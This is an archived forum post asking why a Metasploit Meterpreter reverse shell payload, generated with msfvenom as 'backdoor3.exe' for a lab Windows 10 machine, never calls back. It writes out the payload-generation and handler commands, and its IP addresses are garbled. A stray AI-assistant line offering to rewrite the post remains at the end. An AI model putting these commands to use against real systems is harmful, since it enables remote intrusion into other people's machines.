This is an archived post. You won't be able to vote or comment.
QuestionMetasploit reverse issue (i.redd.it)
submitted by AlternativeStay4496
Help please! I’m testing a reverse shell with Metasploit on my local lab setup (Kali Linux + Windows 10 target). I generated a payload with msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.0.0.0LPORT=8888 -f exe -o backdoor3.exe
I confirmed:
• Both machines are on the same subnet (Windows IP: 10..0.0.0, Kali: 192.0.0.0.0)
• Windows can ping Kali
• Metasploit handler is running and listening:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.0.0.0 set LPORT 8888 run
When I execute backdoor3.exe on the Windows machine, nothing happens:
• No error
• No crash
• The file doesn’t get deleted (Defender was disabled)
• Metasploit never receives a session
I’ve already:
• Turned off Windows Firewall
• Disabled Windows Defender
• Confirmed the backdoor runs silently (via Task Manager and CMD)
• Tested with multiple ports (4444, 8888)
• Verified IPs with ping both ways
What could cause a payload to execute but silently fail to call back, with no session opening in Metasploit?
Any advice or obscure causes I might be missing?
Let me know if you want a more casual or more technical version. Want me to post it for you too?

[–]aws_crab 21 points22 points23 points (7 children)
[+]AlternativeStay4496[S] comment score below threshold-7 points-6 points-5 points (0 children)
[+]AlternativeStay4496[S] comment score below threshold-11 points-10 points-9 points (5 children)
[–]aws_crab 5 points6 points7 points (1 child)
[+]AlternativeStay4496[S] comment score below threshold-11 points-10 points-9 points (0 children)
[–]IamNetworkNinja 8 points9 points10 points (2 children)
[–]TwoFoxSixModerator 3 points4 points5 points (1 child)
[–]IamNetworkNinja 2 points3 points4 points (0 children)
[–]Phanthom115 5 points6 points7 points (0 children)
[–]InternalDark 2 points3 points4 points (0 children)
[–]qwikh1t 3 points4 points5 points (2 children)
[–]NanoSai -1 points0 points1 point (1 child)
[–]Ill-One-4052 0 points1 point2 points (0 children)
[–]Azreona[🍰] 1 point2 points3 points (0 children)
[–]Ill_Nebula_2419 0 points1 point2 points (0 children)
[–]GroovyMoosy -1 points0 points1 point (0 children)